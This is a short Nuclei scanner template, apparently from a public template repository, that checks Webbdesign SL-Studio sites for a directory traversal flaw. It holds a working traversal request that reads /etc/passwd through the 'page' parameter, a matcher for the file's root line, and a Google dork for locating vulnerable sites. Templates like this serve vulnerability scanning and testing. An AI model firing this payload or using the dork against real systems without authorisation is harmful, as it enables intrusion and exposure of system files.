nuclei-templates/vulnerabilities/other/sl-studio-lfi.yaml

27 lines
552 B
YAML

id: sl-studio-lfi
info:
name: Webbdesign SL-Studio Directory Traversal
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018110187
metadata:
google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.'
tags: slstudio,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200